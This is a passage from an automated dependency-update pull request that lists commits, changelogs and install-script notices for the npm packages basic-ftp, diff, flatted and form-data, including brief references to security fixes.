href=\"https://github.com/patrickjuchli/basic-ftp/commit/5d41e45073ed1a8a3b5e5a1bbfcd131e61295bf8\"\u003e\u003ccode\u003e5d41e45\u003c/code\u003e\u003c/a\u003e Bump version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/49c2e73ed1cae4962ae38b33ab93a3548c2f5622\"\u003e\u003ccode\u003e49c2e73\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/2a2a0e6514357b9eda07c2f8afbd3f04727a7cd9\"\u003e\u003ccode\u003e2a2a0e6\u003c/code\u003e\u003c/a\u003e Skip invalid filenames\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/65c90d949c0f8a9709759dff9e76bbe07061812b\"\u003e\u003ccode\u003e65c90d9\u003c/code\u003e\u003c/a\u003e Fix permissions for workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/593cb7831bec60d5590acc3eeb2e553f4a431167\"\u003e\u003ccode\u003e593cb78\u003c/code\u003e\u003c/a\u003e Set permissions for workflow jobs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/36adf110beabc9acdcad122149a2ea795a2b1a6c\"\u003e\u003ccode\u003e36adf11\u003c/code\u003e\u003c/a\u003e Remove deprecated CodeQL check\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/9da4af0e1f82fe372bedc1b7820f55c6eaf012e5\"\u003e\u003ccode\u003e9da4af0\u003c/code\u003e\u003c/a\u003e Update changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/699303975bea182b966f9f34a1ecbbebe92afcef\"\u003e\u003ccode\u003e6993039\u003c/code\u003e\u003c/a\u003e Improve naming\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/0b8f7560e11af817d70ff17f986b334ba2e99b81\"\u003e\u003ccode\u003e0b8f756\u003c/code\u003e\u003c/a\u003e Improve naming\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/67a53f21623e4047d28d7a6f98f539f1adc9d1d0\"\u003e\u003ccode\u003e67a53f2\u003c/code\u003e\u003c/a\u003e Bump version\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/patrickjuchli/basic-ftp/compare/v5.0.5...v5.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~patrickjuchli\"\u003epatrickjuchli\u003c/a\u003e, a new releaser for basic-ftp since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `diff` from 5.2.0 to 5.2.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kpdecker/jsdiff/blob/master/release-notes.md\"\u003ediff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.2 - January 2026\u003c/h2\u003e\n\u003cp\u003eOnly change from 5.2.0 is a backport of the fix to \u003ca href=\"https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\"\u003ehttps://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003ev5.2.1 (deprecated)\u003c/h2\u003e\n\u003cp\u003eAccidental release - do not use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b7b6339dea15baa636bebe7092ec1cbabf001dea\"\u003e\u003ccode\u003eb7b6339\u003c/code\u003e\u003c/a\u003e v5.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b5377abefc55cd424e82308515cfbdc4d53ad8a1\"\u003e\u003ccode\u003eb5377ab\u003c/code\u003e\u003c/a\u003e Update package version to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/78017899c4c80d51db805b6e013079cadc6ed0ae\"\u003e\u003ccode\u003e7801789\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/649\"\u003ekpdecker/jsdiff#649\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/042a8372f331ffd3d81b1e4b799409c7d944e6fd\"\u003e\u003ccode\u003e042a837\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/647\"\u003ekpdecker/jsdiff#647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/kpdecker/jsdiff/compare/v5.2.0...v5.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.3.1 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.3.1...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.1 to 4.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.4...v4.0.5\"\u003ev4.0.5\u003c/a\u003e - 2025-11-17\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Tests] Switch to newer v8 prediction library; enable node 24 testing \u003ca href=\"https://github.com/form-data/form-data/commit/16e00765342106876f98a1c9703314006c9e937a\"\u003e\u003ccode\u003e16e0076\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/5822467f0ec21f6ad613c1c90856375e498793c7\"\u003e\u003ccode\u003e5822467\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set Symbol.toStringTag in the proper place \u003ca href=\"https://github.com/form-data/form-data/commit/76d0dee43933b5e167f7f09e5d9cbbd1cf911aa7\"\u003e\u003ccode\u003e76d0dee\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/68ff7dda8834d6de095a7008cef0e03bc252ca98\"\u003e\u003ccode\u003e68ff7dd\u003c/code\u003e\u003c/a\u003e v4.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5822467f0ec21f6ad613c1c90856375e498793c7\"\u003e\u003ccode\u003e5822467\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eeslint\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/76d0dee43933b5e167f7f09e5d9cbbd1cf911aa7\"\u003e\u003ccode\u003e76d0dee\u003c/code\u003e\u003c/a\u003e [Fix] set Symbol.toStringTag in the proper place\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/16e00765342106876f98a1c9703314006c9e937a\"\u003e\u003ccode\u003e16e0076\u003c/code\u003e\u003c/a\u003e [Tests] Switch to newer v8 prediction library; enable node 24 testing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad\"\u003e\u003ccode\u003e41996f5\u003c/code\u003e\u003c/a\u003e v4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e [meta] fix readme capitalization\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e [meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e [Tests] fix linting errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before 